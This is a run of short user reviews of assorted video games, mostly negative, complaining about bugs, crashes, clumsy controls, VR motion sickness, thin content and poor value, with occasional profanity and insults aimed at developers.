Pretty amateurish. This is a platformer built around the (by this point fairly common) mechanism of switching between two planes to avoid obstacles or use platforms. In most games like this, you can see all of the relevant objects, but you will pass through stuff that's in the other plane. Not so here, instead everything in the light world is totally invisible when you're in the dark world, and vice versa. This makes any sequence longer than a single screen length (most of them) an exercise in trial and error. The only way to see hidden items is to swap, and thanks to the length of the swap cooldown, doing so will get you killed most of the time. So while the main path through the puzzles is fairly intuitive, if you want to look for secrets, or even if you just don't expect the objects to be where the devs put them, you'll have to run each puzzle multiple times. Just not very well thought out. The game also isn't as pretty as it looks in the promo material -- it just doesn't feel great in motion.
I Love this game don't get me wrong. I thoroughly enjoyed the atmosphere it created and it felt like the stakes were higher in this game compared to the last. The soundtrack was good and the new places were creepy as all hell. It really made me glad that it was just a point and click adventure. The reason for the down vote is purely because the game crashes alot. If you love this series and are willing to risk it then I'd buy this game when it's on sale, perhaps you'll have better luck than I.
Purchased this game for myself and some friends. The first two matches were fun and it seemed like a fun arcade game to spend an hour here and there. Unfortunately, the game got progressively buggy. It crashed multiple times when attempting to start a new match resulting in some people not being able to play both sides. We started new lobbies to attempt to fix this and started experiencing crashes in the lobbies. Finally, after our 10th or 11th attempt, we decided to stop playing.Its a shame. This game was fun and Id be interested in playing if it were stable.
You guys have had a full year to show that you are still developing the game, and yet nothing to show?
Much hard! Can't move the blocks very well with the keyboard!
it's a good game for more light hearted worries or if you yourself feel the need to vent, but it's so draining to see multiple posts by the same people who clearly need professional help, who mock your attempts at helping them by sending more letters that make it obvious who wrote it. had to delete this game because it was negatively affecting my own mental health.
Boring and repetitive
After the chinese firm bought this game, they turned it a buggy mess, and it's show generating algorithm also started to sucks. Like you are playing just same kind of games over and over again which makes the game incredibly repetitive.
+graphics might be better than other clicker-gameplay is too boring, no other mechanic beside clicking (yeah i knew it's clicker game)-uninteresting upgrade, mindless...
*I have played more of this game then the .1 my account says but it did not track for some reason.All I am going to say, this game has been out a year without a update. In early access, Don't be tricked.
Bad camera and controls, that affects gameplay. Similar puzzles and boring levels.
A great idea but a very mediocre implementation.
The simplicity and monotony have ruined this game. Not recommended.
Very ambitious game, level of detail is great. However the cons cant let me recommend this gamePros- Nearly every league and division in the world- Detailed stats on thousands of players- Ability to train and develop players any way you chooseCons- Very unpolished UI- No music or sound of any kind- Tedious menus- Tutorial is very lacking- Overall takes too long to actually play a match- No guidance whatsoever for new playersThis game is very ambitious and I would really like to see what it looks like a few months from now. But unfortunatly I cannot recommend it. It does not feel like a complete game, there is still alot of work to do on the developers end. Especially on the UI. Moving from day to day is extremely tedious as are most other things. I hope the developer can fix these things. It would be a great game if they did.
Although the idea of the game is interesting, I cannot recommend it. The main cause is that the tutorial is close to non-existent, which makes the game very difficult to learn. There is alot to be improved and polished about it.
While the game itself is actually a good one, with old-school puzzle mechanics, I do not recommend to purchase this game.The game is filled with bugs that will lead the game to crash and that will corrupt your savefile half way through the game, making it impossible to beat. There is one puzzle in which I have to open an envelope to continue (about 30 minutes into the game) in which the game shuts down with an unexpected error and that is it. As the game was released in Novemeber 2016, do not expect it to become more stable in the near future.
Need to start in windowed mode to 'unlock' the buttons of the game to play it in full screen mode (seriously?)Aside from that, it's a real kids 'puzzle' game. So simple that a 3 year old toddler can play it.
Very good concept, but beating the last 25% of the game requires enormous amount of mindless grinding. Too sad.
One of the worst games ever everything about it is dreadful you are just in som ♥♥♥♥ arena wher you fight endless hordes of german soldier that just swapn in your face and the gun play is just the worst and not satisfying at all dont buy this ♥♥♥♥ even tho its cheap its not even worth it for the meme
In the demo version there is all right, but in full version there is a very angry bug! I cannot start the map, because then I chose the photograph, nothing... Please fix it!I use VR-helmet HTC Vive Cosmos.
Plagued by technical issues from the moment that I opened the game. Mouse capture sucks, resolution picker sucks, music overlaps with itself when moving between different parts of the game in a jarring way, there's inexplicably a loading time after you finish a level, stupid cutscenes when a puzzle is finished, and a number of ways in which this game pretty clearly fails the basics. Maybe in another few weeks or months they'll fix the technical issues and add polish, but as it stands, it's not worth playing, for any price.
The browser doesn't load, you can't add your own music, and there is only one game. The game gives you and the AI three (random?) cards, and then you choose one, then the AI chooses one. Then you wait to see who wins, which is generally just the one with the larger number. There is no strategy in the game, as the only thing you can control is what order you play the cards in.Also, the AI makes these remarks about how embarrassing it is to strip, and bids you not to look, but you have no choice. You have to pick something to strip, or the game won't proceed. Also, there are very few options on what to strip. You can only strip the skirt, underwear and shirt. You can't select the leggings or shoes.And the password for entering the game? Useless.If you put in a wrong password, it just asks you if you want to create new password, and then you gain access.
Well, if you miraculously get it for free or for a few cents, it's a thumbs up. Oh but it crashes a lot when progressing through the story, so beware.I know the price isn't steep, honestly maybe my expectations were just too high for this price. I just felt like I played a demo of a VN. As in, I feel like most of the stuff that happens is pointless. If you play it, you'll know why. Although I'm not recommending you do that.
very short and boring game
The first game is WONDERFUL. Refreshing, great puzzles (although you might need a walkthrough for all the combinations), great cutscenes and graphics and a great ending, maybe a fitting ending to the game and not to leave room for a sequel.The second one, this one, is like the first - except someone decided to take the first and sh** all over it. First of all, the voice acting. This woman is ideal as Kate Walker from the Syberia series, but in this one, it's like a hotline for doctors; "now I need my bandage" she says, in an all seductive voice. There is also the WORST kind of puzzle: eating. As a castaway, you CANNOT be expecting a full course. So, when you offer the characters a raw egg TWICE, they will say "No, not this, I need something else for a change." You ARE ON A F****** ISLAND, YOU STUPID B****. Let me send a buffet, hold on. And those "energy bars". Fill them up, but don't give them TWO raw eggs no no no...Also, I wish there was an option where you WOULD NOT have to see the characters blink and watch you move, eat, talk to your cellphone and other activities... Creepy. Furthermore, the ending SUCKS. There are two ways to end the game and the one sucks so much I'm not even going to write it. On the positive side, there are many new locations and a lot to explore.So, if you are looking for a game to smash your nerves to pieces and make you hate adventure gaming, it's here.Thank you Microids. You officialy SUCK.
Although I think this game is overall good, I can't quiet recommend this game.This game is visual and sound focused, tile moving puzzle. 3 same color tiles have to align horizontal or vertical. Rest part is like 1024.Visuals, graphics, sounds, and other things are EXCELLENT, but gameplay design itself is opposite.- Difficulty rises too quickly. Every level, you will be introduced with new mechanic of the puzzle. This game should have many 'sub levels'(like 1-1, 1-2, ...), to players get familiar with them and enjoy more of level.- Gameplay depends on luck too much as game progresses. In later levels, I found myself suicide every time after I collect a single key piece. I think this problem comes from too small board size; Many mechanics are not suitable with 5x5.  How can I move tiles strategically where over 1/4 of board is blocked by non-moving stones? - Overall playtime is short, in perspective of 'length' of the game.- Replay value is low.  Also after you beat the game, you can play all previous levels, However, even if you select level 1, EVERY previous levels will randomly pop up. It's like just selecting background and music, not 'level'. Separate 'Random' option is needed. Every other things are OK. So, this game will be perfect when those problems are solved.
I am a fan of time management games, and I have played a ton of them. To be perfectly honest, this one is pretty bad. It has some outright perplexing game design choices that make it look more like a fan mod for some other time management game than a complete product. Time management games live and die by their game design (I mean, nobody is playing this for the story or because the multiplayer is so fun), and this one is just not well done. It's cheap, sure, but that doesn't mean you should waste your time on this.
Just a mobile idle/clicker type game.  Not a strategy game.
3/10 (Long story short) Bonsai simulator where you prune trees that're definitely not bonsai for hours.Although Bonsai is mildly relaxing it doesn't provide a good example of actual bonsai and falls short due to not having a save option, having to be left running all the time, and few options. To get all the achievements it will take around 30 hours of play time and most of it will be AFK waiting for the tree to grow. My takeaway:Pros  Can Be Relaxing  The Tree Looks Nice And Sometimes MovesCons  The Music   Enraging Wait Times  Not A Good Representation of Bonsai  -So Don't Bother Using This An An Education Tool  Grindy  Extremely Limited  It's Just A Tree On Some Land  Becomes An Eyesore After A While  Even If You Prune It The Tree Will Go In Whatever Direction It Wants  The Highlight Branch Feature Is Useless  Needs To Be Fullscreen  Limited Tree Choice Boring  No Tutorial Most of the time you'll be enraged by the long wait times and just chop the whole thing down 
tl;dr unplayable with bad controls and just bad design all around. Not worth it even if F2P. 0/10.I tried this game again after an extended absence. I do this thing where I stop playing a bad game in hopes that it will get improved by the devs and/or that my opinion (if it's holding me back) will change. On this latest playthrough, neither of those have changed.Relevant to my gameplay: I used the 360 controller only (didn't attempt keyboard, don't think it would be any better).Ultimately I can't write a full review on this because I can't get past the first race. And it's not a problem of skill, though I am not very good at this game. The problem lies with the laggy controls, confusing powerups that do almost nothing, the extreme slowdown when hitting obstacles (or being completely stopped), and the AI players that never hit a side wall or get shot by you (unless you are extrememly lucky). So this current playthrough, I attempted the same 1st race 7 times and my best place was 8th. It falls back on the flawless AI and the maps which aren't designed for travel, they're designed to slow you down and stop you. That's not racing. In fact that's not even gameplay, Especially when you add in that the controls almost always over compensate and only do so after a lag on the input so you don't turn at all when you hit the turn, then you hit the wall, then the overcompensation comes in and you hit the other wall immediately after. So in order to turn, you have to try to turn well before you even get to the turn, then magically stop turning and use the bank breaks to slow yourself down from hitting the inside wall. What? Anyways, this game is going in my crap section since it is virtually unplayable and nothing else about the game has any appeal. It comes down to: *so-so graphics and music*bad racetrack design*flawless AI*unforgiving obstacles*and terrible controls. I admit, I am not good at this game. But from a basic game creation standpoint, the first map should be relatively simple and a tutorial to ease people into the gameplay and controls. This game literally fails at the onset. In fact, even the menu screen is a fail because it's unintuative (other then pressing A or B a bunch of times) and the devs didn't even bother to map the D-pad to navigate the menus. "Full Controller Support," HA! At least I got it on sale and got to sell my steam cards. 0/10
The amount of content (4 minigames) is really pretty thin in general, though not really unfair at this price. Most importantly, though, the physics are really, really wonky. Nothing feels quite right, and considering that it's a skill-based game it ruins the core mechanic. You'll lob a ball and it'll just fall onto the ground in front of you, possibly landing just out reach and breaking the game. As it stands I can't see myself demoing this to anyone and certainly not playing it myself.It does have potential, though. Add a few (and I mean few, like two) more games and fix the physics and this would easily jump into my demo rotation.
The game itself is quite good. However there are way too many bugs in the mini-games that prevent you from progressing further in the game. Since you can't save in stages, this means that your only option when you encounter a bug is to restart the game from the very beginning. I restarted the game twice before I just gave up.
It's good for the price, and maybe as a gag game, but if you're looking for a Landlord simulator to play seriously and want something similar to the functionality of House Flipper, this is not the game for you. The minigames are kinda boring, and the controls don't work great which can get frustrating fast. Additionally, the map doesn't have the minigame places marked so you end up walking aimlessly trying to find them. Additionally. you spawn in near houses, so you start buying houses to rent, but you have to travel and try to find the apartments on the unmarked map. Maybe try a different game, but unfortunately there just isn't any good Landlord simulators out there right now.
While not the worst mobile to PC port I've seen, Battle Riders just really isn't as fun. It has decent graphics, decent physics, but horrible sound design and music. It still contains that 'brainless' mobile type of gameplay where everything is dumbed down for phone controls, so it just becomes a boring experience.For $5.00, you can get Gas Guzzlers: Combat Carnage, which is miles better than this game.
I have a problem with lagging, game slowing down and becomes unplayable in the upper levels for no reason.
EDIT: I appreciate the developers explaining their design choices. And they are right. This vr stuff isn’t formulaic. There isn’t no easy answer, and I can’t imagine developing a game at the pace of innovation the vr world is going through. I’m not returning the game, and I hope that the devs are successful with making this game more comfortable for vr.I will double down on the fact that pressing a move forward button that doesn’t move in the direction you are facing is very disorienting. I had to move while looking down at my ‘chest’ to know where I was going.Original:This game has a few of the big NO NOs for vr. Strafing and movement set to keyboard/controller controll. I don't get vr sick easily but this game did it for me. There is no teleport mechanic. Also there is no easy way to tell which way 'you' are facing. The move forward key isn't relative to where you are looking. Even more vomit!I like the physics based knock over blocks idea, but this implementation is very difficult to play without getting sick.Even for 2 bucks on sale I'm considering returning it.Did run without lag on a radeon 7800 series card.
Devs are ♥♥♥♥♥♥♥ idiots! Where is strafe?! Have you seen a shooter w/o strafe ability?
This game has fantastic presentation.  The look, feel, UI, soundtrack, and overall aesthetic are all consistent and impressive.This can not save the game from the fact that it is TERMINALLY BORING.  It is essentially the same children's toy we all grew up playing: fit the brightly coloured block through the hole.  The shape of the block becomes more complex, and you are given very little time to orient the block correctly, but the objective is identical and it never evolves into anything interesting.If you strip away all artifice, the game is literally just matching shapes within a time limit.  If this sounds appealing to you, maybe give the game a shot.  If this on its own does not sound enthralling to you, then the game is unlikely to hold your attention for more than five minutes it takes to get over the initially impressive presentation.  Just watch the trailer, 'ooh' and 'aah' at the visuals, and then move on.If you were really looking forrward to trippy visuals while flying through abstract tunnels to cool music in VR, might I recommend Thumper or Rez?
Not a game. This isn't a game. This is some kind of pretentious interactive experience with obtuse narrative and no goal at all. It's just about 30 minutes of roaming around two places, reading a few texts and completing one minigame. It tries to tell a story, yes, but it's terrible at it. Technically is also quite terrible, but that doesn''t even matter. It could have Crysis 3 graphics, and still would be terribly annoying. If you wanna try it, bear in mind that this is not a game, and wait until it's on sale. Then it will still be a pretentious waste, but a cheap pretentious waste.
This game is unfinished. I played through about 3 hours before realizing many of the tracks are to glitchy to play reliably. The handling of the marble just feels wonky compared to more polished older games like Marble Blast Ultra. Don't purchase this game if you are looking for that experience.
I love the board game, but this should be a relatively light app. Instead, it causes my gaming laptop's fan to whir like a jet engine taking off, you can't change resolution or go into windowed mode, just a very sloppy mobile port all in all.
TLDR: A mediocre memory game, it's not really what I would call a cooking game, it's all about memorizing ingredient order to survive another another day and get a new highscore. Memorizing sandwich ingredients as fast as you can just doesn't make for a fun game.Full review:Let's talk about gameplay first, In Make The Burger you... don't make the burger, technically speaking. You just pick toppings, you don''t need to cook meat patties and you don't need to cook various toppings first, you just shove it into a burger by clicking on ingredient icons.Gameplay consists of customers showing up ordering a burger(never more than one and never soda or fries), click on correct ingredients in correct order and you made the burger, then you have to drag and drop it on a customer. If you screw up even a little customers will leave totally unhappy, every order has to be perfect or it's considered a disaster. There are also unlockable ingredients, but these just add more things for you to click on, as I said there is no simulation of cooking involved, you just click on ingredients. There is absolutely no restaurant managing aside from getting more tables.So gameplay is extremely primitive, "why would anyone wanna buy this?" the devs thought and decided to make it as difficult as possible, mainly by making it a memory game, you have to memorize orders before stuffing ingredient because you can't see order information while ïn cooking menu. Another way difficulty is achieved is by giving you progressively less and less time to "cook" and by flooding you with customers. On a bright side, this game is pretty, it's charming, bright pixel art is about the only good thing here. The music and sound is just ok for a $2.69, game though it could certainly use more than one(1) music track.
 Blackjack Story Oh Im sorry... Black JACK story.I bought it on Xmas and gave it a go a week later. I was thinking it to be a simple Blackjack (Im an avid Blackjack fan and enjoy it in every presence , in every game) and I was hoping I'll get joy out of this one...*sigh* I was soooooo, wrooong...The game is terrible and not because It's indie..., but its bad, ,,,really.The mechanics are somewhat slow (the counter can show you got 22 then IMMEDIATELY change back to 12. Heart attacks and shtting brix guaranteed.) The game runs on a very slow pace... you can click the button 3 times until it activates. The Score counter is retarded. I personally saw how it counts two Aces (It scores as 12) as 22. The game is rigged In favor for CPU. Seriously. For a game which is basically based on a chance you get WAAY too many Draws (Push) like once per two three rounds. Whenever your opponent has 10 points, for 90% hes gonna score 21. Whenever you have 10, you gonna go Bust. The more you bet the more OP your opponent gets. And the more you proceed in the game the more difficult it becomes? REALLY? In Blackjack!? If so at least add some difficulty levels in it. Whats next? Final Boss Battle?! The Customization of your cards and the character. Basically 3 color reskins for the deck and the ''Hero''.The last one gives him an eye patch... probably Blackjack makes you lose an eye at some point...for some reason..Yaay! What's the name of our hero again? The cards are ok I guess...Oh and by the way you cant switch between those skins... you purchased it? Its permanent. Medevial theme for a Blackjack? Seriously? No no I do respect imagination honestly... but really? Rustler. That rat-face ♥♥♥♥♥♥♥ is unbeatable. Honestly he's the CPU's favorite.. I personally lose EVERY ♥♥♥♥♥♥♥ match when I play against that sniveling bastard, Just a vaccum sucker for my chips.. oh sorry... gold coins. May he get AIDS and die!  The amounts of the bets are fixed. 10.20.50.100.500. ... Why? NO such options as SPLIT (My favorite part of Blackjack) and to FOLD (you know...to lose gracefully) ... again.... Why? The ''Guess The Chest'' and ''Wheel of Fortune'' feature to reclaim some chips,..oh sorry... gold coins to continue the game... The biggest minus of it is that... You need to wait for 1:30 IRL HOURS after each play... the only good thing is the developer had mercy on our souls and the time will expire even when you're out of the game... phew!...Overall.. Im not into refund. Well what were me and you expecting?. Its an Indie game. Although personally I dont recommend it, still if you want to buy it. Buy it, not even during a special sale... Its not gonna pierce a hole in your wallet I think. And it has cute 52 achievments (yeah a one card per each) which I used for decorating my profile. Thats all. Always bet on blue.Alice ♣
what the actual ♥♥♥♥ with the gender ♥♥♥♥♥♥♥♥ in the begginig? did sjw bite you or is it absolutely neccessary for a hisotrical detective to focus on 16 genders?
this should not be a seated vive game, fps in general for vive should be at least small room scale to where your movement dosent seem inverted when you ty to turn arround to shoot somthing and continue moveing . the game sometimes does not load properly in vive either.
3 broken achievements, developer abandoned broken game!
Very badf the company that created this game should be ashamed that this Sh*t costs money. -rep
Making Istanbul game, translate to 5+ european countries but doesn't have Turkish translation.
Lair of the Clockwork God is extremely frustrating. The whole schtick is trying to take the piss out of "modern" (circa 1993) gaming trends like puzzle platformers, so it complains about everything that sucks in platform games - you have to keep repeating the same bit over and over, you keep falling down a hole and you need to play it again, you waste half the day sitting around waiting for moving platforms to reappear... But instead of subverting the tropes, it becomes exactly the sort of game that it (rightfully) was dumping on.Do not be fooled. This is not an adventure game. This is not even the skeletal remnants of an adventure game. It is a platform game with all the terrible parts of platform games, but it's even worse because it tries to shoehorn in some vaguely adventure-ish mechanics. The control system is designed for consoles, I guess, which means you can't just point at something and click. You need to walk over to it with WASD, then hold down Q, then grab the mouse, then click some icon while you're still holding Q, then let go of Q, then some incredibly slow dialog starts, which you can't skip with the mouse, but there's another obscure key for it, but then you miss an important hint because the dialog doesn't work like an adventure game where the first click reveals the sentence and the second click moves to the next one, it just skips the whole thing, then you need to hold Q again, or maybe right shift, I don't even know. At some point you can use T to teleport, or maybe it's tab, and E does something too, and at this point I'm starting to think this is some kind of cruel meta-joke about flight simulators or something.It is the most infuriating control system ever. And I suppose it might be alright if the jokes were really funny, but - just like the previous Ben and Dan games - they're mildly amusing at best. A few mildly amusing jokes definitely do not outweigh hours of falling down holes and landing on spikes and holding down Q. I rarely give up on games, but this was such a chore, I couldn't go on. To quote the characters: harrowing.
Though this piece has support for english only speakers, the dialogue is somewhat poorly translated.Otherwise it is a subversive take on fairy tales, which is better experienced with the dialogue of the main characters to a degree.Though I would not recommend to an english speaker, any further updates could quite easily change my mind.
I enjoy TD games quite a bit, but I wasn't a fan of this.I found it incredibly boring. It takes up to level 30 something before you encounter something that even resembles a challenge or any cause for strategy.To me the experience felt closer to a clicker game than a tower defense. The kind of thing your dad might have on his phone.I'd maybe recommend it for someone under 10.
AH GOD MY EYESBright flashing lights, no good.
I love search and find games. It makes me calm whenever I feel stressed. This game is HUGE for a search and find game, and it even has a reasonably interesting story. BUT. It does not calm me. It's so frustrating because you need that one item to "use" to get to another item, even if all the other items in your inventory can be used to get to that one item. Example: I have tweezers, scissors, a small saw, a bottle of some toxic acid, and a screwdriver in my inventory. I need to get something small that can be found inside a piano, behind the strings. I can literally use every f'in item in my inventory to get to it but NO. The game specifically wants me to find a pair of tongs in a different room, in a different level. It just requires too much backtracking and accessing the guide. I gave up. Pity, because it definitely had potential, looking at the size and story and graphics of the game.
keeps freezing crap game
It's not RTS. It's not even a strategy. It's Benny Hill Simulator in Japan setting.Don't get me wrong, but:  This is kinda Galcon Fusion with ruined gameplay  You're limited to four armies, so get prepared to jump with these armies for hours  I'm not joking; if there's more than two enemies on the map, the battle can last forever. YES, forever!  What's the problem? the problem is, you have maximum four armies and you'll be jumping over the map with another bunch of armies (to be precise, another twelve ones if you're fighting against three generals) capturing and losing villages until after a hour of jumping you'll be lucky enough to destroy enemies capitals.  Oh, the game crashes constantly when new battle starts. To be honest, I'm writing this review just after this masterpiece crashed once again.  It's not even a game. It's a parody to a game. It's buggy, it's unsupported, it's unplayable, it's abandoned.2 out of 10 dead Japan Generals
Meh.I'm a big fan of TD games but the UI/UX on this is so clumsy. Needs more work.
I see some serious potential in this title.I'd even go as far and say its potential could be Isaac 2.0 material.But I can't recommend the game in its current state.The game seems &amp; plays as a woefully early release. As seen by the 4 minor updates, not even a week after its release.Positive notes.I like that it saves your progress on mutation chambers, so you don't have to start over when you do finally encounter one.The mutations is a nice idea, that requires you to change you playstyle on the fly.Also the subtle level is strategy, that you can pick up all the snot now so you don't have to backtrack. Or you can save it, in case of a bad room and need to regain health.The online feature is nice(although in the same state as the game.)The negatives.It feels really un-organic to explore the game. I've encountered a couple of times where 80% of the map was locked off, because I didn't have any keys. Which ofc once I completed the floor, the "things you missed" helpfully reminded me was all behind said locked doors. I'm all for rogue-lite, but that feels really unfinished in the random generation. Also the maps twist and turn into itself for no reason. The rooms are very close and the map seems small, but you can only travel the map via the provided doors. Many(Maybe even most) of the rooms aren't connected, which only feels like an attempt to pad gameplay out.The skill system needs some attention as well. How it works is, that you kill a boss and aquire 1 DNA. Which you can spend on skills and skill slots. You get the first slot free, second costs 3, but the third costs ballpunching freaking 12 DNA to unlock? With the rate you earn DNA(1-3 per run depending on skill) that seems way to early in the game to ask for that ammount. Sure you can unlock more skills themself, but you'd still only be able to use two at a time.The passive items seems really unintuitive, they're all just a slightly different version of things that follow you around, at least so far.Also there's still the issue with 2-3 enemy types that actually damage you before their attack animation...Final thought.The rate at which you get new mutations(weapons/playstyle) is what ultimately made me make this review. Almost 3 hours it took to aquire a new mutation. If the game in itself was really enjoyable and you felt like you where actually working towards something, say like Enter the Gungeon or The binding of Isaac etc. I wouldn't mind the slow windup. But in both games mentioned, even at that ammount of hours, you're invested.After this many hours in Freaky Awesome, I'm ready to call it quits.Maybe wait for another week or two before buying. Which should give the game 5 - 10 patches to hopefully unearth some of that so promising potential.
I've bought the game at the launch and it was a fun game without players but fun to play with friends locally anywaynow i discover that the game went free. Thats sad (for me lol)Hope that you guys give for free the PS4 version too :DR$36,99 jogado no lixo &lt;3
Bad, it doesn't work with triple screen setupsIt won't let me change to a compatible screen resolution.Stuck in Triple screen mode, it needs a Launcher like other games where it lets you change settings before going into the game.
I want to start this off by saying I love Christmas themed HOGs and I am usually a big fan of Elephant Games but this game was a disaster. The art is lovely, as always, and the voice acting was also good but the characters were sorely lacking in personality. I'm not sure what we're supposed to feel for the engineer, is he meant to be some sort of chaotic neutral fairy guide? I disliked him immensely and the concept of the train stealing people until they atone for their Christmas related sins was nowhere near what I thought this was going to be based on the game description.My biggest gripe, however, has to be the puzzles. A lot of them were decent, some of which were admittedly difficult but some of them simply didn't work. I'd put the pieces in the right spots and nothing would happen. I'd exit the puzzle, re-enter, move things about, but nothing would accept the thing as finished until I clicked 'Skip'. The answer was what I was putting in but it wouldn't finish and let me continue unless I skipped it. This is ridiculous, is it a hit-box issue? I played this game for three hours, including the bonus chapter, and have to say the only thing I really enjoyed was the bonus content. Also, you can't actually complete the collections unless you play the bonus chapter! I couldn't figure out what I was missing before I played it and then found the remaining puzzle pieces, morphed objects and collectibles after the actual game. Not going to lie, I've asked for a refund for this one.
Boring and uninspired gameplay
ugly ugly ugly.  The whole point of a racing game is its replabability, and this game has none. 2 friends and I tried this game and none of us had any desire to ever play again.
Just beat it. Less than 9 hours of game play. The last 2 hours my restaurant was fully upgraded, was just grinding for gangsters. Needs more content.
Its crap
ABSOLUTELY NEEDS A TUTORIAL!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!It took me a bit to figure out how the controls worked.I am not sure if the game is good or not.Once a tutorial is placed, I'll leave a like.The art and characters are cute, the gameplay is not so much at this moment.
I really look forwards to all of this developer's games, but this one was a huge letdown. I could not get passed the first 10 levels it was too incredibly buggy. Even with the sale price, I still paid too much.
Terrible game, crashes constantly. 100% unplayable RIP RCT Franchise :(
Played it in standard mode as I don't have a VR headset, but I'm not sure if having the latter would make a much of a difference. I was drawn in by the comparisons to Rear Window but the concept wears thin after a while because, as others have pointed out, there's actually not much to do. Ultimately, there are only two endings to the story, with replay value heavily depending on how badly you want to collect all the achievements (meaning endless grinding and reloading of chapters). Also, it made my computer crash a couple of times and once even made it inexplicably power off mid-game. I gave up trying to get 100% achievements after that. If you do really want this game, I can only recommend getting it when it's on sale.
Meh. After really enjoying Chime, this game is just more of the same but with different songs. Unfortunately, very few of the songs are all that unique or interesting to me.
Be warned: this is a point-and-click game best meant for mobile devices.Music was nice, hand drawn art was really cool, but the actual gameplay content was severely lacking- and it isn't even the game's fault. Its trying- or at least the screenshots lead you to believe that its trying- to be a 360 immersive VR game, and it simply isn't.Many objects are flat 2D textures, and several items have to grow larger and closer on the screen because you can't move an inch.
You can't even play the game. The size resolution make is useless. Can't even start the game since I can't hit the continue button. Save your money until they actually put out a usable game. Am asking for a refund.
-No options menu. Seriously?-No way to change the resolution.-Same songs play over and over.-When you exit, it still seems like the game is running, so you have to close Steam, which is the first time I come across something like that.To sum it up, the cute gameplay doesn't make up for all the features the game lacks. Not recommended.
Bad game
If you enjoy motion sickness, you'll love this game
This game is the absolute worst thing I have ever laid my eyes on. If you have epilepsy, or any functioning vision at all, do not play this game ever. You are 100% guaranteed to have a migraine after less than 30 seconds of gameplay. If you enjoy vomiting and losing your sense of direction, than this game might be the right choice for you. Otherwise, if you are a human being, you will have decided that eating your own feces is more enjoyable than this dissappointing smegma canyon.
Finished the whole game within 15 minutes. There are only a few episodes and so few weapon options. Waste of a dollar but nothing else.
Pretty jenky, couldn't pick levels after completing, the cat wouldn't move anywhere on the third level. do not recommend.
i want a refund i could not play this game at all the product key does not work worst game ever!
I brought this game going into it with an opn mind, but EXTREMELY quick into it I was put off by the elements of sexual abuse and abuse in general.Not to mention that while the voice acting was okay, yes, the game itself and the characters were incredibly two dementional with no good qualities. The men all had flat, generic, boring and predictable personalities; and the heroine was the same.Boiling the datable characters down gives you a character that seems generally normal at first, and then turns out to be some scary, edgy, abusive and horrible man that wants nothing but the heroine's body or to have her all to himself away from anyone. Doing the same to the heroine, she's just the generic anime girl that is there to be abused and eventually succumb to stockholm syndrome and "live happily ever after" with her abuser that has for some reason decided to actually love her and stop hurting her.I just... Hm. I was expecting a lot more than the flat, predictable, and not very thought out world I was given through this game. :/
I usually never EVER write reviews about games, ever. But this game is really hard and it took me almost 10 tryes just to get past level 3 just because these knights come into play towards the end and at one point thats ALL that is there, and with the units I have there is too many to take them down and they will just kill me and make me lose yet there is one set of barbarians which is what I need but theres so many that I can fight them, but then I end up with the same number of troops. Which happens with the next level as well.. You get a good amount of units and try to get better ones and when you do only one unit spawns in a group and when you go to take them down to add them to your squad you end up breaking even and its annoying because you cant progress.So in conclusion I would recommend it only if it is on sale or if this game looks like something you would really like. But watch other people play it first.
Beautifully done, but not at all worth $10 for how short it is. I could maybe justify it if it included smooth locomotion and something to do other than just walk, but as is it just feels like an expensive demo.
Really wish I could recommend this game but the bugs and poor translation ruin what would have otherwise been a cool experience. Ran into two game breaking bugs, one fixed after a reset and the other remains to be fixed, in the last chapter. After solving a puzzle the game reverts back to a state before the puzzle was solved, while the timer continues to countdown.Another huge problem, especially in the last chapter, is the game is throwing a ton of background lore at you while an onscreen timer ticks away, in a scenario where the game can't even be paused. The interface already makes it hard to quickly grab information, but now you have to grab it while racing the clock, and solving puzzles. Your option is either to go slow and actually absorb the lore (failing and having to repeat after multiple attempts), or go quickly and miss anything story related. The concept of this game is great and almost done well here. ALMOST. It needs better translation and better writing, way less bugs and a better UI. Whether it was script or direction, the voice acting was not up to par either.Playing for so long only for the game to break at the end really soured me on it, but I'm hoping the devs can fix it for their next iteration, because there is definite potential here.
Alright so, basically if you don't watch Cyanide &amp; Happiness, then the only charm this game has will fall on deaf ears. You wont like it. I greatly enjoy Cyanide &amp; Happiness, but this game was bare bones... okay.You're a bullied teen named Coop, you click things and it's funny sometimes but mostly repetitive. Are you a video game completionist like me? Be prepared to swiftly lose interest in clicking all 3 options for a bunch of random items in each room. This is one of the few games I've played with interest that forced me to take day by day. I'd manage around an hour or less a day playing this game before I got sick until I finished the game.Honestly, I was super excited when I got to the apocalypse part and well, that's the end of the game. If they don't release a less than 20 dollar DLC or other game as episode 2, just don't play this. Honestly, wait for episode 2. I gave this game a lot of credit because I figured "Oh boy this is going to get super funny soon" when in actuality no, the game ended at that point.Game talks about Dark Humor, correct me if I'm wrong but I really just saw 2 parts that I'd consider dark humor. The part talking about Coop as a child, pretty damn good but a lot of jokes fall flat or just give a smile.
I feel genuine hatred for this game, but more than that I feel genuine hatred for myself for clicking "buy" without thinking. Absolutely worthless and the very existence of this in my Steam library taints it.
dont buy this game because the graphics its too bad and no one online only me :)
This game just makes me sad when I think about it. The premise is great, the gameplay is chaotic yet fun, the designs are awesome and the soundtrack is top-notch. There's just one small thing holding this game back from potential greatness.Multiplayer is fundamentally broken.Super Slime Arena goes for the Peer to Peer approach to multiplayer - P2P isn't at all an inherently bad system, but for what this game was made for (~50 people all duking it out at once), it just seems like a recipe for disaster. Not like you're ever gonna reach 50 people, since there's nowhere NEAR enough of a dedicated playerbase to speak of that'll have the patience to coordinate with each other to join the same room. Don't even get me started on local multiplayer - even with Remote Play, anything above 10 is probably just a pipe dream, especially with how many controllers and ports for said controllers that would require.Not to mention the disappointing radio silence on JellyTeam's end.. they teased a few updates alluding to bots, a training mode, maybe a story at some point - and then they just dropped off the face of the earth. No more news, no major updates, nothing. All this game got was a few bugfixes, months after release, and nothing more.Don't get me wrong, I love Super Slime Arena and the potential the concept has. The problem is that it was released way, way the hell too soon. It's incredibly barren as far as content goes, and what remains of the community (however small it was) has long since dissipated by now.And as much as I'm holding out for JellyTeam to come back and give this thing some well-needed love.. I know deep down that it's definitely not going to happen. At least not anytime soon.Rest in peace, sweet prince.
